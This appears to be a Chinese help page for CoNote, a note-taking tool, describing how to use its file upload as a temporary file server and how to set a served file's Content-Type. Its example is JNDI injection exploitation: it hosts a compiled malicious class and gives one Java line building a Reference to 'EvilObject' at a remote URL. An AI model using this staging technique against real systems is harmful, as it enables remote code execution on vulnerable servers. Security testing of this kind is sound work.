临时文件服务器

在笔记模块,点击“上传文件”,即可将CoNote作为一个临时文件服务器。

临时要在远程服务器上下载什么文件,可以将文件暂时先传到CoNote上,让传输更加方便。

比如,在JNDI注入漏洞的利用中,目标会在远程http服务器下寻找class文件,此时我们既可以将编译好的class文件上传,并设置好文件名:

然后在编写的RMI Server中使用CoNote分配给你的URL即可:

Reference refObj = new Reference("EvilObject", "EvilObject", "http://example.2m1.pw/");

另外,发布文件也可以设置Content-Type,这个Type和文件本身的Type无关,这个Content-Type是在文件被显示时返回在HTTP头中。比如我可以上传一个html文件,然后设置其Content-Type为text/plain。这时候访客在访问这个文件的时候,将会直接在浏览器中看到内容,而不会解析html。

results matching ""

    No results matching ""